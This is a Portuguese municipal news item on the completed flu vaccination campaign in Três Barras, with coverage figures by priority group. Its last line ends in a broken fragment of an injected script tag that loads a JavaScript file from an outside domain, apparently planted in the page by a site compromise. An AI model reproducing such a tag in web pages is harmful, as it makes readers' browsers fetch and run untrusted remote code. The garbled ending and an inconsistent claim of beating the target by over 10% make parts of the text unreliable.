O Governo de Três Barras, por meio da secretaria de Saúde e da Vigilância Epidemiológica Municipal, concluiu a imunização contra a gripe com cobertura de 100,63% dos grupos prioritários, totalizando 3.851 pessoas vacinadas.
Para ultrapassar em mais de 10% a meta preconizada pelo Ministério da Saúde, a enfermeira Kátia Reis destaca o empenho e profissionalismo das equipes de saúde durante toda a campanha, iniciada em 23 de abril. “Prova disso é que, a uma semana do fim da campanha nacional, já fechamos a cobertura”, afirma a responsável pelo setor de imunizações da Vigilância Epidemiológica.
Divulgado na sexta-feira (09), o último relatório da campanha aponta que o público com maior número de vacinados foi o de idosos, com 1601 pessoas com mais de 60 anos, totalizando uma cobertura de 97,68%.
Na sequência vem o grupo das crianças – de seis meses a menores de cinco anos – com 1289 doses aplicadas e uma cobertura vacinal de 94,23%.
Alguns grupos, inclusive, ultrapassaram a meta de 100% de cobertura, como são os casos dos professores, com 322 imunizados (153,33%); os trabalhadores da saúde, com 401 doses aplicadas (113,60%); e as puérperas, com 50 vacinadas (138,89%).
Com a vacinação de 188 mulheres, a imunização das gestantes fechou com 85,07% de cobertura, faltando menos de 5% para chegar à meta nacional.
A Vigilância Epidemiológica acredita, no entanto, que muitas das mulheres faltantes tiveram bebê e foram imunizadas como puérperas. A secretaria municipal de Saúde já comunicou oficialmente, esta hipótese, à Secretaria de Estado da Saúde, responsável por informar aos municípios o número de pessoas a serem vacinadas em cada grupo.
Para mais informações, acesse: www.tresbarras.sc.gov.br/noticias… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>